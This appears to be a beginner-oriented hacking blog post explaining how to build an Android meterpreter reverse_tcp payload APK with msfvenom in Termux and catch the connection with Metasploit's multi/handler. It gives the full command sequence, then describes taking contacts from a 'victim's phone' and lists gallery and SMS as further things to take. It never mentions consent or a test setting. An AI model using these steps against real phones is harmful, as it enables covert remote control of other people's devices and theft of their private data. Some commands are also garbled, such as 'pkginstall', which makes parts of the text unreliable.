How to set a payload in Metasploit ? termux | Android hacking | legal or illegal ?

PAYLOAD

 

Hello guys welcome again to our blog. Today i am going to show a practical of how to set a payload in metasploit. It could be made on your computer or laptop using KALI LINUX but i am using android because most of you are using android platform. So it will be very easy tutorial for the every single person even he is new to my blog or a new learner.

The prerequisites needed to make this payload are normal. You just need am android mobile phone with termux installed. After installing termux here is the complete process.

INSTALLATION OF TERMUX

The termux application can be installed by just searching it on the play store. If you don't know what termux is, then you should watch my post about termux --> TERMUX

You will get the basics and some extra information about termux in my post. It will be very helpful for you. After installation you have to open the termux application and install some packages for exploitation and making a payload. Those packages are actually scripts which helps in making payload. The packages are listed below which are needed to be installed.

1 --> python

2 --> python2

3 --> msfconsole 

You just need these packages for exploitation. You can install a package as defined below :

$ pkginstall package_name -y

Above the -y is the permission to package to be installed given by the user.

$ msfvenom -p android/meterpreter/reverse_tcp lhost='your IP address' lport=4444 r>and.apk 

In above command i actually structured the payload. Initially i had written msfvenom which means that this is gonna be a payload. This will penetrate the target system. -p means the payload to be used. then we have declared some important terms that are android/meterpreter/reverse_tcp , means this is an android payload and we use it through meterpreter in metasploit and the protocol is gonna be TCP (transmission control protocol). It is a protocol in which data packets are sent. Then lhost will be your IP address , which will be shown by typing a command ifconfig . lport is the Localhost Port on which the connection listen for the victim.

R is raw format of the payload. And in the last there will be the location of the payload application where it is gonna be installed. By default it is going to be stored in home directory. 

Then your payload is going to be saved at the location. You can check the application by changing directory with 'cd' command and list all the files with 'ls' command.

Then you just have to start the msfconsole with the command :

$ msfconsole

After the msfconsole opens [It may take some time] you need to configure those commands in the metasploit framework which we used in creating application. 

$ use exploit/multi/handler

This command is used for using the built-in exploitation function.

Now we have to set the payload in the console by executing the same commands with minor changes. 

$ set payload android/meterpreter/reverse_tcp

We has set the payload now we have do the same with the LHOST AND LPORT. Let's do it :

$ set lhost your IP address

$ set lport which you mentioned above

Then if you want to check everything is working fine then you just have to type command show options. 

Then you just have to type the command exploit to start the exploit. It will start the process and show you the result if any system will install your application.

This is the resultant of our exploit. I just fetched contacts from the victim's phone. You can also fetch his gallery, contacts, sms's and many more things. You can check it by typing command 'help'.

THANK YOU FOR READING AND STAY SAFE